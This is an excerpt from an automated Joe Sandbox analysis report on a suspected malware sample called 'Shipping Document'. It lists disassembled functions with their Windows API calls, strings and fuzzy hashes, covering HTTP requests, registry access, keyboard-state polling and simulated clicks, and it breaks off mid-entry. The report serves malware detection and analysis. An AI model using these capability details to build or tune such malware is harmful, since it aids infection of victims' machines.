0, xrefs: 01022CA4

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 37df962dcbaf43c649faa7e4dc1f2199a936538c1c675859d2942b7ab4746f25
Instruction ID: 5ca3359ba41d9d1383d829a7a6d793eec5265ca512e9a299de25feb5dddfd2de
Opcode Fuzzy Hash: 37df962dcbaf43c649faa7e4dc1f2199a936538c1c675859d2942b7ab4746f25
Instruction Fuzzy Hash: 5841BF742043529FD720EF68C884B5BBBE8EF85320F14465EFAA5972A1D770E505CBA2

Function 01019372 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FC7F41: _memmove.LIBCMT ref: 00FC7F82

Part of subcall function 0101B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0101B0E7

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 010193F6
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 01019409
SendMessageW.USER32(?,00000189,?,00000000), ref: 01019439

Part of subcall function 00FC7D2C: _memmove.LIBCMT ref: 00FC7D66

Strings

ListBox, xrefs: 010193B5
ComboBox, xrefs: 01019380

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: 92e045ed388b03fcadfe1da57285e7e87df0c8d7bd91dc33e18aef57968e5633
Instruction ID: 54afbd7e9e2b4808efef86ac62ac43946e8969ade7795e476f267952ebbdca55
Opcode Fuzzy Hash: 92e045ed388b03fcadfe1da57285e7e87df0c8d7bd91dc33e18aef57968e5633
Instruction Fuzzy Hash: EB2146B1940105BFEB14AB75CC86DFEBBB8DF05364B00411DF9A6971E4CF3D09099A10

Function 01031B21 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 01031B40
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 01031B66
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 01031B96
InternetCloseHandle.WININET(00000000), ref: 01031BDD

Part of subcall function 01032777: GetLastError.KERNEL32(?,?,01031B0B,00000000,00000000,00000001), ref: 0103278C
Part of subcall function 01032777: SetEvent.KERNEL32(?,?,01031B0B,00000000,00000000,00000001), ref: 010327A1

Strings

, xrefs: 01031B87

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: dfd86a87e8d52eb9cf034739ddd898f5d19cdc9e270a7cebadf3f650ea9222ef
Instruction ID: 9e2eef2d0fa44eb869f4cfe3b0b297151cb9b7516de4329f00aeb394037d730f
Opcode Fuzzy Hash: dfd86a87e8d52eb9cf034739ddd898f5d19cdc9e270a7cebadf3f650ea9222ef
Instruction Fuzzy Hash: 6C21BEB5500209BFEB269F289CC4EBF76ECFB89644F00011AF585E2240EB399D0587B1

Function 01046656 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00FC1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00FC1D73
Part of subcall function 00FC1D35: GetStockObject.GDI32(00000011), ref: 00FC1D87
Part of subcall function 00FC1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FC1D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 010466D0
LoadLibraryW.KERNEL32(?), ref: 010466D7
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 010466EC
DestroyWindow.USER32(?), ref: 010466F4

Strings

SysAnimate32, xrefs: 010466AB

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 582d942775272bf48474bdaeb584585d20373ec9200ee129cce8d691d18b48b2
Instruction ID: 833d6023ba34fc601fd57cc30bed7188b43b558cc4e5e6789066ea31e681b38e
Opcode Fuzzy Hash: 582d942775272bf48474bdaeb584585d20373ec9200ee129cce8d691d18b48b2
Instruction Fuzzy Hash: 7E218BF1200206ABEF119E68ECC0EBB77E9FB4A364F104639FA9196191E77388519760

Function 0102710C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 0102712B
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0102715D
GetStdHandle.KERNEL32(000000F6), ref: 0102716E
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 010271A8

Strings

nul, xrefs: 010271A3

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 4be315b8e66a3e742b5dd8e14492f0f3b087c893a4f17ffbbc45dc02e99a3e9e
Instruction ID: 424b6276e9f6d9912c6e207a8f64029950755484577e942cfea4ba7da05899dd
Opcode Fuzzy Hash: 4be315b8e66a3e742b5dd8e14492f0f3b087c893a4f17ffbbc45dc02e99a3e9e
Instruction Fuzzy Hash: EB21B3756002269BEF209F6D8C44A9AB7E9AF65720F300699FDE0D72C0D7719441CB50

Function 0102703E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 0102705E
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 01027091
GetStdHandle.KERNEL32(0000000C), ref: 010270A3
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 010270DD

Strings

nul, xrefs: 010270D8

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: b3a11d49d8e0bc51b13580190c0e750dc74b912a2cd0c2abca4486fa60af06c7
Instruction ID: 667eeb727a0b6c34eb994edce771695affcfcd93981e6de1bebaa207bb744663
Opcode Fuzzy Hash: b3a11d49d8e0bc51b13580190c0e750dc74b912a2cd0c2abca4486fa60af06c7
Instruction Fuzzy Hash: 46215378500226DBEF209F2DD884A9EBBE8AF54720F204659FDE1D72D0D775A854CB50

Function 0102AEAB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0102AEBF
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0102AF13
__swprintf.LIBCMT ref: 0102AF2C
SetErrorMode.KERNEL32(00000000,00000001,00000000,0104F910), ref: 0102AF6A

Strings

%lu, xrefs: 0102AF26

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 2bf1a810b7b67671e08f3e19f7170a95f675acef33c79154f7b9652398cdd307
Instruction ID: 4c2c00a575750cb319ff1ca04871f91dc50ec5dcba29f5d4e39b4fcf1506ac1f
Opcode Fuzzy Hash: 2bf1a810b7b67671e08f3e19f7170a95f675acef33c79154f7b9652398cdd307
Instruction Fuzzy Hash: 1F21B374A0010AAFCB10DF69CD85EEE7BB8EF89704B0040A9F949DB251DB75EE01DB21

Function 0101A52F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FC7D2C: _memmove.LIBCMT ref: 00FC7D66

Part of subcall function 0101A37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0101A399
Part of subcall function 0101A37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0101A3AC
Part of subcall function 0101A37C: GetCurrentThreadId.KERNEL32 ref: 0101A3B3
Part of subcall function 0101A37C: AttachThreadInput.USER32(00000000), ref: 0101A3BA

GetFocus.USER32 ref: 0101A554

Part of subcall function 0101A3C5: GetParent.USER32(?), ref: 0101A3D3

GetClassNameW.USER32(?,?,00000100), ref: 0101A59D
EnumChildWindows.USER32(?,0101A615), ref: 0101A5C5
__swprintf.LIBCMT ref: 0101A5DF

Strings

%s%d, xrefs: 0101A5D9

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
String ID: %s%d
API String ID: 1941087503-1110647743
Opcode ID: 0de4c12516bee203509edf9c1e3c582386a50e91c00c99ced331962ff4edeb0e
Instruction ID: 256e20962f84f14144699c25ace21c93d0077a519203d869c9fb9deed7cdb203
Opcode Fuzzy Hash: 0de4c12516bee203509edf9c1e3c582386a50e91c00c99ced331962ff4edeb0e
Instruction Fuzzy Hash: B811D2B120024ABBDF10BF74DD85FEA37B8AF88300F004069B988AB046CA7859458B34

Function 01022017 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 01022048

Strings

KEYS, xrefs: 0102205F
EXISTS, xrefs: 01022070
REMOVE, xrefs: 0102204E
APPEND, xrefs: 01022081

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: 78e1abc6ebf89d506dc433abc0adbfcc19329ce9e55b0a6f0f1140d988ba9fdc
Instruction ID: ed793858fd7ec64ca87c5229499733ed85dad300be1ebab56379cbd311561465
Opcode Fuzzy Hash: 78e1abc6ebf89d506dc433abc0adbfcc19329ce9e55b0a6f0f1140d988ba9fdc
Instruction Fuzzy Hash: 6C115730A0011ACFCF10EFE8DD819EEB7B5FF05314B508898E895A7253EB36694ADB50

Function 0103EE69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0103EF1B
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0103EF4B
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0103F07E
CloseHandle.KERNEL32(?), ref: 0103F0FF

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: e3cfa107d436488422ffa0cc37defea2ba11fd5f1d29394dc776845417df040e
Instruction ID: df3aa87872ad353d5ed0a9271bddb77a9240b447b540d6319262f0c246f09f00
Opcode Fuzzy Hash: e3cfa107d436488422ffa0cc37defea2ba11fd5f1d29394dc776845417df040e
Instruction Fuzzy Hash: 5981A3716047029FD720DF28CD86F6AB7E5AF88710F04881DF599DB292DBB5AC41CB52

Function 010402C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00FC7F41: _memmove.LIBCMT ref: 00FC7F82

Part of subcall function 010410A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,01040038,?,?), ref: 010410BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01040388
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 010403C7
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0104040E
RegCloseKey.ADVAPI32(?,?), ref: 0104043A
RegCloseKey.ADVAPI32(00000000), ref: 01040447

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: 8359fee9e7823f4afbe81e2b03ad9f3b734d23e3fde2492e13e51290ceeea4ee
Instruction ID: a30ce784ca45a3799b16d49275c4ad12ae9101022b64bc46adc391e006ce8582
Opcode Fuzzy Hash: 8359fee9e7823f4afbe81e2b03ad9f3b734d23e3fde2492e13e51290ceeea4ee
Instruction Fuzzy Hash: B6516BB1208205AFD700EB68CDC1FAEBBE8FF84704F04896DB59597291DB75E904DB52

Function 0103DBDC Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00FC9997: __itow.LIBCMT ref: 00FC99C2
Part of subcall function 00FC9997: __swprintf.LIBCMT ref: 00FC9A0C

LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0103DC3B
GetProcAddress.KERNEL32(00000000,?), ref: 0103DCBE
GetProcAddress.KERNEL32(00000000,00000000), ref: 0103DCDA
GetProcAddress.KERNEL32(00000000,?), ref: 0103DD1B
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0103DD35

Part of subcall function 00FC5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,01027B20,?,?,00000000), ref: 00FC5B8C
Part of subcall function 00FC5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,01027B20,?,?,00000000,?,?), ref: 00FC5BB0

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: 4b891774879398b2182f319795e57245eba907d7c9231c35d0bed9743b15b7bf
Instruction ID: 317258707279020feaa332733bbb0fd5d125b78b5685c0e2a7d2f2489d30f095
Opcode Fuzzy Hash: 4b891774879398b2182f319795e57245eba907d7c9231c35d0bed9743b15b7bf
Instruction Fuzzy Hash: 8D514B75A0020A9FCB01EFA8C985DADB7F8FF49310B458099E859AB312DB75ED45CF50

Function 0102E7DC Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0102E88A
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0102E8B3
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0102E8F2

Part of subcall function 00FC9997: __itow.LIBCMT ref: 00FC99C2
Part of subcall function 00FC9997: __swprintf.LIBCMT ref: 00FC9A0C

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0102E917
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0102E91F

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: e956972db2284c8e5dbe2ba37a5a149dcd15c3e0ba9d02b1ba33e3df961d4753
Instruction ID: 5611c9d17f374cdb697c18bdbb9ec496092104dadbae063942f2aed5f722afd7
Opcode Fuzzy Hash: e956972db2284c8e5dbe2ba37a5a149dcd15c3e0ba9d02b1ba33e3df961d4753
Instruction Fuzzy Hash: 53513975A00216DFCF01EF65CA85EAEBBF5EF08310B148099E849AB362CB75ED11DB50

Function 0104A2C5 Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6e5d11faf1007f367d778e116e3936d7e81c58f3d994a25bbced3089f2de2b0
Instruction ID: bcbcb2139b6dc539235d2c7b702dfae59c07e5536bd0bcfa6a530d109ac486db
Opcode Fuzzy Hash: c6e5d11faf1007f367d778e116e3936d7e81c58f3d994a25bbced3089f2de2b0
Instruction Fuzzy Hash: 8341F2F9A40104EBD760DA2CC8C8BA9BBA4EB09311F0581B4FAD6A72D1EB7199418A50

Function 00FC2344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00FC2357
ScreenToClient.USER32(010867B0,?), ref: 00FC2374
GetAsyncKeyState.USER32(00000001), ref: 00FC2399
GetAsyncKeyState.USER32(00000002), ref: 00FC23A7

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: a8e3f2f422ddea6e065144c24bd92e75ee89a2ff9078d077fa9263e47600754a
Instruction ID: c4e3a94b8c58ffd3a4c08037a8ef2764d620fafebaa1f80a9dd48d63747ff2c6
Opcode Fuzzy Hash: a8e3f2f422ddea6e065144c24bd92e75ee89a2ff9078d077fa9263e47600754a
Instruction Fuzzy Hash: A5417F7590415AFBDF159FA8C944FEDBB74FF05320F20431AE968922A0C7356950EB91

Function 01016920 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0101695D
TranslateAcceleratorW.USER32(?,?,?), ref: 010169A9
TranslateMessage.USER32(?), ref: 010169D2
DispatchMessageW.USER32(?), ref: 010169DC
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 010169EB

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: 05f2089925491467d09adefc027625dea32ec6231330e0038c4cd0c6a4dd095e
Instruction ID: 6448ce8684e19cc985a6dfb8926db93a50e9d97eed4bbc9878494c838057bdf2
Opcode Fuzzy Hash: 05f2089925491467d09adefc027625dea32ec6231330e0038c4cd0c6a4dd095e
Instruction Fuzzy Hash: 1E31D271904246ABEB71CE799C84FFA7BEDAB05300F1541A9E5E1C3149E7AF9085CBA0

Function 01018F01 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 01018F12
PostMessageW.USER32(?,00000201,00000001), ref: 01018FBC
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 01018FC4
PostMessageW.USER32(?,00000202,00000000), ref: 01018FD2
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 01018FDA

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
